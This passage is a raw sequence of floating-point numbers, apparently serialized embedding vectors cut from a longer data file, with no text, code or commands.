008795182,-0.006149677,0.0051424876,0.12912953,0.0017908354,-0.022918997,0.009103146,0.0136008775,-0.004755682,0.020998372,-0.00831484,0.0016193317,0.004213968,0.018076465,-0.015349013,0.018238243,-0.008704361,-0.023559263,0.014251639,0.022851098,-0.02563924,0.018709093,-0.0025950314,0.015654828,-0.027058566,-0.02595833,-0.044762846,-0.013979133,-0.057796128,0.042761184,0.013168908,0.014745027,0.005451414,0.010115617,0.004515198,0.008569471,0.025371408,-0.0066607036,0.0066595715,-0.008145851,-0.0134237595,-0.00044533177,-0.016891204,0.033725962,0.0010545969,-0.0033928922,-0.011346438,-0.011691664,-0.0074062888,-0.013201305,-0.0050166147,-0.00010862264,-0.023103211,-0.00086991844,0.0040061083,-0.006735082,-0.02512553,0.004716928,-0.023662472,0.0077325692,0.0042497558,0.0054624476,-0.009643557,0.021291075,0.0024173388,0.002860493,0.0014199239,0.016004724,0.0009984146,-0.032383867,-0.01954681,-0.007117678,0.0055509754,0.012352157,-0.025559977,-0.0181285,-0.0070486316,-0.008667373,0.011022886,-0.0088647995,-0.018929278,-0.011243117,0.016391652,-0.0067258216,-0.0005726043,0.016242305,0.014229013,0.014970537,0.0077431193,-0.02095562,0.02166174,-0.0025906865,-0.00042123467,-0.019674933,0.016258376,0.0338698,0.0110427765,-0.0152453175,-0.005988508,0.009778426,0.005838291,-0.019653322,0.0015761409,-0.011308351,-0.024908314,0.014329918,-0.015571569,0.012774261,-0.011120046,-0.006526722,0.009746522,-0.006649125,-0.009373721,-0.00983443,0.022943577,0.016529677,0.0009489617,0.0013954181,0.013001067,-0.02574579,-0.010712344,0.01381901,-0.018027745,-0.0043815686,0.0034777722,0.032161992,0.017592361,0.029250346,0.011405201,-0.0130880745,0.010703149,-0.009703738,-0.0029545438,0.009422281,-0.019505959,0.0049605123,0.015550517,-0.013358645,0.005514216,0.018760646,0.010868493,0.021448294,0.008896595,0.023414746,-0.0063294424,-0.0015624152,-0.023514492,0.004573274,-0.025507806,0.026661543,-0.0010189891,0.00019316468,0.00027423733,0.012636839,0.013323275,-0.01422422,-0.028978465,0.009647199,-0.006584372,0.007980581,0.017706132,0.00040559372,-0.018614173,0.009327332,-0.001550918,0.0028357722,-0.029590806,0.015151162,0.012858213,-0.0059342496,0.002003452,-0.002615197,0.010019137,-0.012287198,-0.0031095159,-0.0021722883,0.024300175,-0.01646668,0.011765291,-0.011521576,0.02635851,-0.013625069,-0.0011612857,0.031797692,-0.013466804,0.0037220581,0.00048619325,0.024099957,0.014489226,-0.0057934714,0.007306399,-0.01221994,0.012601159,-0.0019031896,0.00013254704,-0.0055141915,0.018568112,-0.0061642933,0.02636047,-0.019820314,0.037822515,-0.028203236,-0.0495876,-0.006064611,0.001285793,0.015463889,-0.025124408,0.011108285,0.0028328511,0.0048202327,-0.008733413,-0.014457446,-0.0052606435,0.015728746,-0.0027978402,0.0026420215,-0.022410993,-0.0036632025,0.000045653287,-0.015649106,-0.02155925,-0.008280777,-0.00036539524,-0.0087362705,-0.0003700355,-0.0056567024,-0.017536175,-0.012503344,-0.0031225744,-0.012421582,0.018092709,0.016965033,-0.015191215,-0.016098842,-0.011442115,-0.0035741888,-0.020280385,-0.024605742,0.0012079838,0.031575512,0.026460597,-0.00541948,0.004797777,-0.007258872,0.020145735,0.016287982,-0.0037582233,-0.025100058,0.015196393,0.013401663,0.0017740183,0.0005149207,-0.023513354,-0.020700857,0.000568537,-0.01902916,-0.010978728,-0.01611452,-0.0053413184,-0.004128299,0.024287134,0.0046889097,0.002169073,-0.0054415273,0.012518617,0.00397416,0.027606094,-0.0033395318,0.004011258,0.0070866034,-0.0023461082,-0.005368056,0.0013266328,0.0139557915,-0.011049319,-0.010919574,0.011976433,-0.0019223164,0.013742692,-0.00074781495,-0.006589207,-0.0049274703,-0.0035871046,0.010598241,-0.0034861076,-0.009432382,-0.0070037176,-0.0070426404,0.011329423,-0.00078504987,0.037323207,0.05008441,-0.05917594,-0.0047046295,0.016314916,0.01677357,-0.021647297,0.030225419,-0.020858323,-0.038978793,-0.033914465,0.014480683,0.009196259,-0.021137195,-0.029884843,-0.0069386465,0.020380585,-0.014909903,-0.0013120022,-0.004420385,0.0018609646,-0.02084653,0.001434445,-0.00826071,0.0003568649,-0.014410136,-0.0011671104,-0.008675089,-0.009646277,0.015835151,0.0049451087,0.030322077,0.013692608,0.008802641,-0.009341934,-0.0031904536,-0.00036909844,0.0036723544,-0.0097108,0.0072720726,-0.03465375,-0.03726718,-0.02000639,-0.0063299723,0.0017768232,-0.0010419957,-0.014356567,-0.004297208,0.021938607,-0.01007608,0.16784093,-0.0048386846,-0.015123252,0.004897169,-0.003591575,-0.007639055,0.0018846145,0.011637895,-0.0047569233,0.009093883,0.0019329645,0.0043993173,-0.002758829,0.030096479,-0.018187376,-0.010467072,0.0064077573,0.14434743,-0.0046908264,0.02475714,0.005949114,-0.007013339,0.0072992207,0.009869305,0.017535182,-0.07338138,-0.00085970666,-0.039700568,0.003453558,0.0027122789,-0.033987533,0.026510347,0.011900819,-0.008045052,-0.015382947,0.0072851046,-0.004160852,-0.01897825,-0.028949684,-0.007864982,0.01106468,-0.0062242867,-0.0074975635,0.0030178234,-0.00039319185,0.0049792225,-0.036942363,0.013881674,0.005247387,0.022776173,0.021583198,-0.0048976312,0.014380767,0.0031260166,0.015761606,0.013948335,-0.0026578703,0.0066797435,-0.02964928,0.030771496,0.0020168445,0.020077692,-0.01949128,0.027589567,-0.0068551386,-0.01097035,-0.020963077,-0.0070709568,0.017092606,0.005568668,0.025491225,0.021804417,-0.01398563,0.00952254,0.016582828,-0.0012588324,-0.008602773,-0.006856401,0.023572402,0.002343685,0.031355713,-0.0017616946,-0.0092379665,-0.0028654109,-0.0005766393,0.00780024,0.0061376523,-0.0060681193,0.012098532,-0.003992604,-0.014455128,0.013161469,0.004318837,0.014831939,0.013433248,0.007118043,0.005357462,0.005293365,-0.004395729,-0.018538835,-0.017422915,0.010853175,0.0037157966,-0.00752176,-0.0060838615,0.0039828476,-0.0009796435,-0.008676251,-0.0096452115,0.0107844975,0.02077619,-0.0014366369,0.024143806,0.023834012,0.004846887,-0.01097159,-0.0025267657,-0.0052664652,-0.02308563,0.017129174,0.0004040997,-0.008563879,0.00065338507,0.011242131,-0.017996445,0.0045489958,0.005653902,0.020424008,-0.008669244,-0.013243235,-0.011270848,-0.0016640406,-0.0014139412,0.06567566,-0.0057625794,-0.011151583,0.011146961,-0.0284354,-0.037023768,-0.0024341925,0.0111097125,0.009344372,0.0077865915,-0.011351098,-0.025006087,-0.014271162,0.0027918527,-0.02154799],[-0.015066627,-0.004759092,-0.015841711,-0.023959571,0.011974198,-0.022235462,-0.010614888,0.018387605,-0.002402001,-0.010261506,-0.003261061,0.027247285,0.0053057075,-0.009758696,-0.03330797,-0.0004287743,0.0003368497,-0.0068531055,-0.009080676,-0.010522025,0.007872621,-0.007974021,0.014017279,-0.028107509,0.010712449,-0.011110589,0.018024046,0.014817997,0.0039578434,0.013868274,-0.008642765,0.0154749425,0.010893791,-0.012295567,0.008734939,0.007109296,-0.024579063,-0.015001197,0.0074663437,-0.011569438,-0.0062850625,0.01664743,-0.0027522591,0.008123517,-0.00057015964,0.0031183464,-0.006681158,0.028216073,-0.0312855,0.0108734965,-0.0049240123,-0.012754713,-0.0062480047,0.032657966,0.002665404,0.02776722,-0.001789461,-0.0151087735,0.0045572645,-0.014673478,-0.005852288,0.018324843,-0.0045285714,-0.017436365,0.045950912,0.00681409,0.00013382896,-0.008488879,-0.00868174,-0.022802785,0.0024428375,-0.009771237,0.005524531,0.014763685,0.023203822,0.017027877,-0.0063242046,-0.02295371,-0.017008314,0.021042123,-0.015264374,-0.0038913991,-0.015891368,0.0007309701,0.009526887,0.0018732217,-0.01998402,-0.0050109695,-0.0015761885,-0.029640792,0.0009836808,-0.0058663343,0.002488581,0.004768824,-0.016865773,0.013635195,0.018008647,-0.0023675591,-0.0020384497,0.0019509244,-0.008017709,-0.008748032,-0.055511635,0.009879565,0.009185322,-0.013912959,0.006359989,0.00074151566,-0.013861149,-0.012066,-0.0038572913,0.007734584,0.0036982414,-0.00814415,0.0015654576,-0.011041523,0.0061466615,0.01703065,-0.008939233,0.0025264283,-0.0130840475,0.020652572,0.0049525937,-0.002819672,0.0029444264,-0.009808121,-0.030569093,0.008484334,0.0018452099,0.0019474694,-0.0073525566,0.015043308,-0.0026102916,-0.012030467,0.016180286,0.00062845496,0.006424607,-0.009019184,-0.003955811,-0.015162636,0.02630969,-0.015176441,0.019484079,-0.013747587,0.03300431,0.02201506,-0.0012545282,0.0135662835,0.018559748,-0.014866606,0.0065780724,0.004120658,-0.009524886,-0.015308654,-0.0010691029,0.010424966,0.012501877,-0.009121799,-0.018178737,-0.024284484,-0.014553749,0.008385233,0.0037942324,-0.011131898,-0.024506409,-0.03743574,-0.0026031674,0.0056044133,-0.0035747385,0.00092757505,0.017416757,0.029083345,0.008282276,0.008395956,0.0028126999,0.0122407675,0.0024702647,-0.012780461,0.0059067416,-0.002624744,0.004917941,0.044412874,-0.023274392,0.0064833956,-0.0045007938,0.021624338,0.025305592,-0.01893346,-0.028637875,-0.003879271,0.0032090761,-0.009475182,0.012621154,-0.0064483797,-0.025273532,-0.01328734,-0.02006993,0.09104705,-0.011938643,-0.0025576903,-0.03473856,0.017127275,0.0018579301,-0.009465214,-0.006722391,-0.015648648,0.007575538,-0.01727756,0.011774673,0.0009173182,-0.0044645886,0.0041213776,-0.017189974,-0.0075221993,0.0090706935,-0.07963232,0.012265196,0.030537166,0.003659139,-0.011726377,-0.011219629,0.011673027,0.004959462,-0.03092001,-0.025725763,-0.018327128,0.0089212395,0.0021231684,0.015880575,-0.027765427,0.016489865,0.022612568,-0.03084455,-0.024170745,0.010534585,-0.017989207,0.0052189706,-0.023776904,-0.0070567424,-0.0058511244,-0.013115055,0.005842919,0.02341536,0.023010133,-0.014498649,0.017236546,0.020550057,0.0057995375,-0.0166116,0.012648713,0.009225485,-0.010884306,-0.0020763464,0.023822453,-0.008523767,-0.005521499,0.0052179336,-0.01174174,0.0009103585,0.022259464,0.015677653,0.016897563,-0.0045793043,0.04177818,0.048378725,0.0105435215,0.0283487,-0.03450356,-0.013659013,-0.012652494,-0.020082101,0.0054173153,0.009266755,0.013117816,0.00081299484,-0.009799138,0.0043017385,0.009676689,0.005908164,-0.002029826,-0.00070395914,0.013446685,0.0095265135,-0.023340493,0.0006505188,0.008881583,-0.0054045753,0.020445235,0.025920019,-0.0060641835,-0.016582657,-0.002069928,0.019056581,-0.007694133,-0.02068764,-0.01692727,-0.017877042,0.0047319145,0.014677648,-0.015652327,0.001526043,-0.008315037,0.014691345,-0.005929856,-0.007392602,-0.004776446,-0.008233881,0.036536027,0.0025811044,0.020528236,-0.029449182,-0.005021995,-0.017070716,0.0011629615,-0.0068125175,-0.0034406837,-0.0122253345,-0.01988339,-0.0011865975,-0.017949346,0.032313988,-0.018308848,-0.0024240734,-0.03278288,-0.00687054,-0.011673838,-0.00095354754,0.008093518,0.020784086,0.008445326,-0.012171414,0.017156003,0.036405936,0.018829662,0.0103773475,0.028983297,-0.00764265,0.026442578,0.012251424,0.025273507,-0.01719571,0.00030165794,-0.0074540535,0.0141910175,-0.0012045522,0.006187273,-0.014053265,0.007206428,0.010132682,0.01623818,0.03416056,-0.01968423,0.0047998596,-0.0059700087,-0.02073137,0.011096935,-0.008917941,-0.01574655,0.025743138,-0.02476902,0.029631093,0.0051959306,-0.017163085,0.01064311,0.06911549,-0.010605306,-0.0034467576,-0.005671101,-0.016975235,-0.009480433,0.031794157,0.012978225,0.0020124966,-0.011216885,-0.013607086,-0.022544987,-0.0052238987,-0.0049604913,-0.0098313205,0.028165057,-0.020579377,-0.010113383,-0.022667665,-0.018383764,0.030093938,-0.027502973,0.003085049,0.016822968,0.009703592,0.009570476,-0.0039975727,-0.008779934,-0.00072502263,-0.02168898,0.0072099296,-0.0067265555,0.002435951,-0.0010146761,-0.036782317,0.000999626,0.010639643,0.006633925,0.0059933094,-0.009341781,-0.00027004554,0.009586013,0.0072139953,-0.012697587,-0.013646388,0.04097195,0.015778959,-0.008535189,0.0034351915,0.017032798,0.0191276,0.011656358,-0.015946703,0.006072838,-0.012747262,0.026398204,0.00399093,-0.041635603,0.04638133,0.02993212,0.0064153103,0.004842045,-0.0004167399,-0.010517121,-0.020479942,0.03192169,-0.010569004,0.009730246,0.010454186,-0.0030490907,0.012331356,0.012595646,-0.0038517204,0.010743345,-0.011457595,0.015095098,0.004251151,0.00217928,-0.0034707922,0.02985433,-0.014194799,-0.0010155528,0.0072211716,-0.002438374,-0.015889479,-0.009157264,-0.0026906258,0.03018734,0.014620915,-0.0063197836,0.0048462795,-0.0024374723,0.012739832,0.014569241,0.022909297,0.039981533,-0.0048803207,0.009944099,-0.0076188245,0.018222883,0.013214378,0.010653779,-0.0010785741,-0.0074280878,0.0017210437,0.0018527013,0.012283917,-0.0010059307,0.0043148673,0.028500339,-0.022420974,0.002259751,0.0029853256,0.006733417,0.0019324721,-0.016698409,-0.013935876,-0.025199262,-0.0018448661,0.0028291983,0.009598002,-0.0076208706,0.009435792,0.031114113,0.0016257529,0.003430786,-0.021625577,-0.003749496,0.002287964,0.008824627,-0.00435427,0.032772508,0.01633432,-0.034450747,0.025081439,-0.00142075,-0.0067978385,-0.029732848,0.03861091,-0.0020108465,0.014376099,0.019504737,0.027650373,-0.0066934223,0.006966469,0.030569846,0.030523887,0.0033137328,-0.017133705,-0.001151739,-0.017016146,0.004034257,0.000390215,-0.01393972,-0.0123484805,0.0014652296,0.030460002,-0.030800853,-0.017311197,0.0032390545,0.026026005,-0.038283907,0.011734088,-0.0072018933,-0.008906056,0.009192811,-0.0038358448,0.05428863,-0.020724775,-0.020517625,-0.0045436523,0.009501894,-0.0072517884,-0.010150573,0.024253119,-0.028277574,0.020186195,-0.0012634825,0.026489107,0.025715802,0.025269825,-0.009647153,-0.014924218,0.024646718,0.010454028,-0.004710909,0.0032632304,0.0061373906,-0.015029198,-0.012769612,-0.0075797024,-0.018991627,-0.0056720925,0.027536038,0.015679143,-0.022877041,-0.025008084,-0.021627536,0.0060966765,0.014447101,-0.0028525658,0.02055441,-0.0067232326,0.015775295,0.009438372,-0.011984289,0.046803582,-0.007481523,0.004434996,-0.021703593,0.028040927,0.02595887,0.0097719785,0.0003105309,0.013181626,0.02851641,-0.006503119,0.0041228253,0.015502647,0.018337866,0.010452108,-0.016123177,0.0015172161,0.009218246,0.010324699,-0.017376754,0.009138708,-0.01598066,0.010602459,-0.010503067,0.0032032456,-0.014266869,0.0026073086,0.016724553,-0.013995461,-0.0058056316,-0.005384258,0.012114349,0.007839967,0.0088838,-0.016969379,0.027584823,0.0044570705,-0.0014058286,0.021342954,0.02173505,-0.0063203634,-0.009464511,0.016606534,0.0081387,0.0019044378,0.0015110649,-0.008045132,-0.00081394525,-0.002723572,0.01572847,-0.00815584,0.0022714303,-0.014132287,0.026393885,0.021022098,0.005122928,0.013643561,-0.00007582253,-0.009414055,-0.0041203415,0.017904488,-0.0060094725,0.01644598,-0.025386171,0.034645595,-0.024405675,0.0026798327,-0.0042524203,-0.008059211,0.008397536,-0.023809502,-0.0031517197,-0.036150504,0.013054921,0.02297018,0.016695578,-0.013743374,0.04219687,0.02372894,0.0071992683,-0.015515256,-0.0041878857,-0.010969887,0.0058057373,0.0019703892,0.0036947255,-0.004995462,-0.0024598876,-0.03924312,-0.025506744,-0.040551994,-0.051491264,-0.021469856,0.042876903,-0.005805938,0.002680698,0.010313541,0.025650628,-0.0023181632,0.0081116175,0.0043189633,-0.033275686,0.002468098,0.02449323,-0.018507998,0.0057435343,0.000458768,0.0077411183,-0.005811327,-0.027959874,-0.008390513,0.006714702,0.0037160818,-0.02677546,0.004221292,0.024519991,-0.030274393,0.013539495,-0.013258917,0.0136008905,0.0013050288,0.048375722,0.024141898,0.0018073649,-0.011088362,0.008800407,-0.002598924,0.0063137794,0.00393915,0.03444367,-0.0044654966,0.032299247,-0.0050915773,-0.00097123504,-0.0039356314,-0.029395849,0.013493767,0.0372429,0.038688876,0.0033752273,0.030291304,-0.017881399,0.011536522,0.026846249,-0.0012629101,-0.0017965344,0.026465666,0.017139476,-0.0060944343,0.027370973,-0.0066616554,-0.0011090533,-0.010840352,-0.013261217,-0.026126983,0.025521457,0.030133314,-0.013051682,0.029286435,0.0026919807,-0.004330845,0.004816548,0.0027757827,-0.02502917,-0.00696347,0.002982283,0.008537542,-0.012369785,0.0028768284,-0.032970194,-0.00022705345,0.021373706,-0.0058018346,-0.00008846665,0.005921121,-0.027584545,-0.004656179,-0.012400428,-0.03718655,-0.022943586,-0.003270005,0.02607031,-0.035336245,-0.00028352218,0.0025082245,-0.0023846189,-0.0065605543,0.017279081,-0.0150798615,-0.014874746,-0.0050519067,-0.013090163,0.025128666,0.023446795,0.0041713463,0.0023221562,-0.01623728,-0.012375736,-0.008775239,-0.005039235,0.0044823224,-0.0021954805,0.018784812,-0.0042831777,0.006586697,-0.0082536945,-0.028140394,-0.019176977,0.01594553,-0.029468011,-0.0032120105,-0.001858611,0.0067912354,0.004843172,0.03091368,-0.008491863,0.018070547,0.02649742,-0.006851953,0.0017181154,-0.020675993,-0.000103664475,0.0327204,0.020904742,-0.037349194,-0.018692076,-0.0074377884,0.009509284,-0.013099145,0.01375952,0.010518603,-0.012893556,-0.013617461,-0.013995802,0.01610109,-0.01963141,0.0033470904,-0.005312965,-0.045115106,0.02978432,0.0018769243,0.004677872,0.0110525265,-0.005539331,-0.0019385015,-0.011963651,0.02372377,-0.032409832,-0.016390828,-0.001091486,-0.011047951,0.009180702,0.00074652815,-0.019332182,-0.03764251,-0.029537257,0.019037958,-0.0078163585,0.013570848,0.008911282,-0.026030114,-0.020902993,0.012587958,0.0066068848,0.0073334402,-0.019462664,-0.003150115,-0.003288902,-0.0060991426,0.01923638,0.012531781,-0.015958734,0.020691209,0.0013662222,-0.016537638,0.022278458,0.0019972175,0.0053732935,-0.018072799,0.00052835746,-0.0012494492,-0.02730025,0.013661622,0.005499926,-0.0012809269,0.050767362,0.00037062488,0.020353805,0.010147296,-0.010068829,-0.01631833,-0.007471285,0.018447094,-0.010981754,0.0071795885,0.0038876834,0.015735516,-0.0024951852,-0.004437478,0.013250494,-0.008388333,0.0039091543,0.03213737,0.0058634537,-0.02696673,-0.03905423,0.009046034,-0.0039730603,0.0071351025,0.006127942,-0.01828856,0.018270088,0.027128698,-0.00050041004,-0.010876848,0.020241143,-0.011494378,-0.009485856,0.0070633003,0.0011393441,-0.013264267,-0.017937766,0.039416883,-0.046495244,-0.016724596,0.024654517,0.008333636,0.011159463,-0.02873018,-0.00039116127,-0.008667273,0.0014049729,0.020060478,-0.011012151,0.0050413865,-0.0142425615,0.01748614,-0.021771438,-0.0017091105,0.00846024,0.015174559,-0.00077337824,0.011461998,-0.013495569,0.0056824395,0.029632216,-0.0332166,0.006699153,0.0029297674,0.009124727,0.0041809883,0.0067083463,-0.015750743,0.019989436,0.0040250444,0.00023019814,0.01571082,-0.024523785,-0.028181743,0.009418366,-0.006115723,-0.021103205,-0.021486726,0.024608098,0.019092077,-0.003115713,-0.002422392,-0.01847284,-0.06322138,0.02859765,-0.012613167,-0.0017323451,0.00080746104,0.016479408,0.0011057141,0.012661784,0.03759432,-0.00814274,0.0011714092,0.0025394969,0.020682286,0.0014706606,0.013434576,-0.01344329,-0.028111998,0.014232863,0.02239559,-0.005602081,-0.0037581231,0.0015379548,0.01713819,0.0003663767,0.0298295,0.0031872662,0.0004051186,0.0027955566,-0.032765526,0.004108401,0.0128749665,0.033884194,0.00028020595,-0.0029062976,-0.008298221,-0.014003997,0.011315265,0.009519125,-0.001512023,-0.014889672,-0.013525563,0.007863712,-0.0067452197,0.030430708,-0.0132642705,-0.031370997,0.010257496,-0.024248194,-0.0031448638,-0.017596567,0.027163565,-0.002395008,0.0059895865,0.02333365,-0.00936661,0.027995342,-0.0073988517,0.013661982,0.022697043,0.006477269,0.0075872643,-0.009363729,0.009320324,0.003291515,-0.01958952,-0.0019664313,-0.0010812195,0.02229576,-0.017511249,-0.03218689,-0.025510117,-0.0053341356,-0.010830313,0.012332783,-0.030683551,0.015659994,-0.011765168,-0.0045608087,-0.008381902,-0.016909415,-0.011154914,0.017333023,-0.029366523,-0.0056739463,-0.042711962,-0.008810973,0.0085092615,-0.00054114935,0.0075303377,-0.01762001,-0.008156767,0.002394489,-0.024067808,0.014729772,0.0059774974,0.011247497,-0.014649307,0.0018036664,0.0017304744,-0.0011485033,0.01729071,-0.0065592425,0.004749704,0.039656725,0.0021075576,0.00078107824,0.011123713,-0.007546089,0.019793306,0.0065878727,-0.013694964,0.0057577784,-0.0067761536,0.018771652,-0.0011184058,-0.005872771,-0.019568482,0.007884389,0.042203426,0.021462055,-0.00022059317,-0.0068484903,0.035633255,0.006026345,0.011907571,-0.007543481,0.01945487,0.017571073,-0.017907737,-0.0025310162,-0.00731015,0.041322496,0.01161004,-0.019637216,0.005887924,0.0037393689,-0.013163617,-0.021380935,-0.017426929,0.003994151,-0.011805208,0.0051425425,-0.022187764,0.0078118425,0.00033964234,-0.038043197,-0.002410971,0.001938843,-0.0054195565,0.014731521,-0.0016707317,0.0058053248,-0.0010309669,-0.015819274,0.01223608,0.012067545,0.0018729173,-0.018507084,-0.0072050365,0.014457438,-0.019470343,-0.021177487,-0.0024682041,-0.005407301,-0.03424386,0.01521685,-0.008777893,-0.012124662,-0.023951007,-0.001149554,0.010331511,0.0019022151,-0.0037426748,0.039013416,-0.00005961397,-0.02361757,0.014983293,0.01876847,-0.009584588,0.0031944546,-0.009676865,0.035043523,0.0009005385,-0.01326587,0.009330249,-0.0014030725,0.0070121163,-0.0042351037,-0.025999544,-0.007106289,-0.010514087,-0.0010583296,0.01628924,0.0031777297,-0.015880138,0.03645293,-0.0015800358,0.019829633,0.005277278,-0.010717916,-0.011184846,0.021455543,0.021282692,0.018073712,-0.01931233,0.003337193,0.025733212,-0.05080855,0.00077724707,-0.010308942,0.0025969553,0.011633587,0.017903883,-0.009015707,-0.02554731,-0.021139914,-0.0081116855,0.011880613,0.018965852,0.005105805,0.008215034,0.017438037,0.016785976,0.0020495674,-0.0055865757,-0.009406126,0.011349734,0.010136087,-0.008144538,-0.011905716,0.02023481,0.0012613789,0.014532533,0.012269705,-0.028774016,-0.022234064,-0.020149468,0.006634525,-0.0023767666,-0.0150450785,0.0029950426,0.01472592,0.009061524,-0.0071688443,-0.01564518,0.03948041,-0.010421415,-0.0063779294,0.010278913,0.02585401,-0.009922553,0.0019840233,0.006387956,0.012042508,-0.006325349,0.0013385414,-0.027175112,-0.028431091,0.007350928,-0.013710685,-0.0031151422,-0.0026483403,-0.014039735,-0.014255834,0.008327918,0.005831116,0.0071356534,0.011765997,0.021875715,0.002652078,0.0037976706,0.00047138068,0.012729808,0.013588922,0.018117743,0.008790665,-0.015448703,-0.00075979147,0.029371139,0.01177717,0.018401472,0.015312399,0.001288633,-0.037613805,0.007932453,0.02033786,0.021282146,-0.022706477,0.025011813,-0.000010713174,-0.018568713,-0.025481332,0.0071954275,0.0035644665,0.016395917,-0.00038007103,-0.0057303165,0.0035896518,-0.0069538234,-0.0054190303,0.045397177,-0.025811665,0.01534805,-0.022646593,-0.000031077445,-0.024658907,0.013168446,0.0008255758,0.017616007,-0.0017693373,-0.027568221,-0.03572728,-0.008788177,-0.009935015,0.023705443,0.0054972204,0.009461456,-0.004108574,-0.007611823,0.021768285,0.008104172,0.0038368208,-0.0023097727,0.03481161,0.012681301,0.017272428,0.032224998,-0.023242624,0.015301822,0.00038191548,0.008489901,0.006717469,-0.008579648,0.022711353,-0.0043362784,-0.0015124058,0.010847373,-0.0211589,-0.033015992,0.019767372,-0.008991243,-0.0017441266,0.054647226,-0.0039523207,0.0078807855,0.0002974287,-0.014307464,-0.01909496,0.00013886292,-0.0043369574,0.0050434843,0.006853191,-0.010004398,0.015088074,-0.043616127,0.022162007,0.000059447855,0.02000288,0.012067088,0.0010142378,0.0021619375,0.0065173735,-0.0055119097,-0.015738534,-0.007521021,0.010171022,0.00695018,-0.030253727,0.024335997,-0.019205369,0.0147551205,0.009801481,-0.0052546617,0.014621665,-0.010010762,-0.001473962,0.009241497,-0.018413063,-0.0076303137,-0.015263742,-0.007183388,-0.011111511,0.022650952,0.020128602,-0.0075060413,0.014675782,-0.013156909,-0.005826365,0.06659166,0.01726512,0.020546356,0.009548157,-0.010510746,0.015314319,0.021859767,0.015770722,0.007590855,0.012365009,-0.025204707,0.022218755,-0.0037618666,0.019878028,0.02452634,-0.022076081,0.0044168904,0.0010514357,0.008515712,-0.019008629,0.00024199927,0.026207741,0.004596489,-0.0031256445,0.0042117815,0.014643105,0.011621965,0.0042811646,0.0076057245,-0.015179843,-0.013159175,0.022484861,0.004773432,-0.004763201,0.007105434,-0.051834974,-0.009179184,0.13831091,-0.0017922857,-0.004314463,0.023509264,-0.010007539,-0.00015249097,-0.10072591,0.014816572,0.0020765201,0.0049509183,0.010762557,-0.010788109,-0.013626544,0.029838447,0.0019904033,0.004355326,-0.020743698,-0.004246548,0.03354252,-0.0128516955,-0.0020324949,0.0013125327,-0.0043447325,-0.004641766,-0.032587893,-0.00037601174,0.008025333,-0.022370683,-0.018112663,-0.01225122,0.0016092326,-0.0060099782,0.016706966,-0.0041304477,-0.028677756,0.013194067,0.014549823,-0.012779524,-0.0082264645,-0.013506454,0.019511834,0.018714422,-0.014697432,-0.02288504,-0.15273024,0.000113087175,-0.00073220587,-0.059095617,0.009453171,-0.012383734,0.010226018,0.0021375248,0.01461669,0.013922804,-0.015768416,0.028546795,0.005812316,-0.013349073,-0.008473794,-0.009090303,0.0045660185,-0.0006177022,0.020777475,0.0035941973,0.017354788,0.0102509335,-0.0077766655,-0.0054459195,-0.02266104,0.0032466706,0.010451501,0.025481857,0.006685583,0.0006342247,-0.014670167,0.0066967094,-0.017250128,0.011950709,-0.013726108,-0.006547487,-0.0062715844,0.012375544,-0.025259594,0.019302933,-0.012333215,-0.015654894,-0.0055426825,-0.0061444603,0.0011070925,0.024857216,-0.006362244,0.01031903,0.017027907,-0.0047946633,0.025617942,-0.0063451477,-0.022155326,-0.0014517964,-0.0017652864,-0.0064468766,-0.01246541,-0.037069082,-0.007171669,0.012198929,-0.0075369324,-0.009234102,-0.022311797,-0.015607425,0.017440382,-0.017981956,0.014008539,-0.015565838,-0.016180014,0.01710034,-0.024377698,-0.00615914,-0.014219331,-0.018913912,0.020582981,0.020845532,-0.0100289425,-0.009984808,0.030427769,-0.012226704,0.0049322867,-0.026885897,0.014115502,-0.040841155,-0.008631382,-0.013200825,-0.0044190176,0.006801516,-0.019307407,0.005714385,0.022934465,0.0007416517,0.015757209,0.0043612993,0.02066985,0.007995161,0.03366851,-0.026268765,-0.009321419,-0.0024351038,0.008615348,-0.023859864,-0.041474834,-0.0043803332,-0.011065881,0.013812188,-0.010111942,-0.01509352,-0.017711049,0.0052402583,0.00575059,-0.010871442,0.02099954,-0.013473067,-0.027956469,-0.005050809,0.013651701,-0.005225569,0.02359418,0.005465818,-0.026905743,0.020790448,-0.0044345683,-0.0014521601,0.047861658,0.008192736,-0.018047506,-0.015890695,0.0059863455,-0.0006222109,-0.029075285,0.029164325,0.0020409042,0.0029401344,-0.02029484,-0.003156073,-0.011646695,0.010886066,-0.026385512,-0.0136374375,-0.0040924647,0.011392243,-0.009247029,-0.008579582,0.0019321954,-0.006381391,0.027337061,-0.00402309,0.031312145,0.00018319735,0.01655011,0.01374079,-0.014559601,-0.021751871,0.020357074,0.060296,-0.0032501682,-0.017975371,0.013658919,-0.0068541756,0.014648256,0.010090801,-0.02429322,-0.017725829,-0.027496064,-0.020403039,0.0022096266,-0.008034319,0.023795111,-0.018918097,0.0114815105,0.003318836,0.009082554,0.01626314,-0.004865752,0.029476829,-0.021723788,-0.0125715295,0.036529016,0.015844466,0.003909647,0.019786544,0.00852577,-0.015741339,-0.026410902,-0.008502617,-0.013557124,-0.0071072592,0.012775022,0.013386494,-0.036024995,-0.027015023,-0.0004788875,0.023368219,-0.0146616185,0.008486493,0.00906129,0.008999435,-0.010553869,0.027580013,-0.014281169,-0.029981537,-0.008882557,0.0042572496,-0.0035375548,-0.0013280218,0.0083682155,-0.0052938005,0.0027814747,-0.0035898916,0.00512095,-0.004391907,-0.0052492786,0.0041284985,0.0071406886,0.027230503,-0.013246284,-0.008822355,-0.0068103187,-0.022644859,-0.005243837,-0.011147085,0.0008882894,-0.002946192,0.02720873,-0.00939185,-0.012862096,-0.022393936,0.013263601,0.0010626145,-0.010286447,-0.025788471,-0.0144401835,-0.029164158,0.03390332,0.008270487,0.016481385,-0.00398857,0.011073882,0.0019391385,-0.038952556,-0.0022059996,0.05493091,-0.0282809,-0.0025616814,0.013720964,0.012805659,0.01828078,0.00020995292,0.0026208563,0.015457884,0.00509108,0.002102729,0.017988358,0.0080533745,0.032314196,0.006883096,0.0020683482,-0.026376842,-0.010133143,-0.0119478535,-0.0048970715,0.028010782,0.013612979,-0.0030140253,0.01200236,-0.018420752,-0.009738862,-0.02692811,0.0014561425,0.0459624,-0.02106966,0.025309453,0.026878893,-0.0019569683,-0.031081233,-0.013332727,-0.0018332151,-0.009829157,0.0113571575,-0.026074529,0.011601463,0.010723718,-0.029368246,0.03458165,-0.0060070413,0.032610133,0.0034604452,-0.016856538,-0.0139204785,-0.02320544,0.02686238,0.01073827,0.008188503,0.03256218,-0.0029543827,-0.018185757,-0.010580624,0.003419347,-0.020712486,-0.00031185453,0.0057743113,0.003163724,-0.022842143,-0.0041991947,-0.012082859,0.011546035,-0.0075529316,-0.001760548,0.003531569,0.023018844,-0.018064866,0.00019680418,-0.016969908,-